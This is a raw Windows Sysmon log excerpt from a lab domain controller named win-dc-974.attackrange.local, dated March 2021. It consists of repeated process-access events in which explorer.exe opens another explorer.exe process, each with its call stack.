16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244554Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244553Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244552Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.645{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 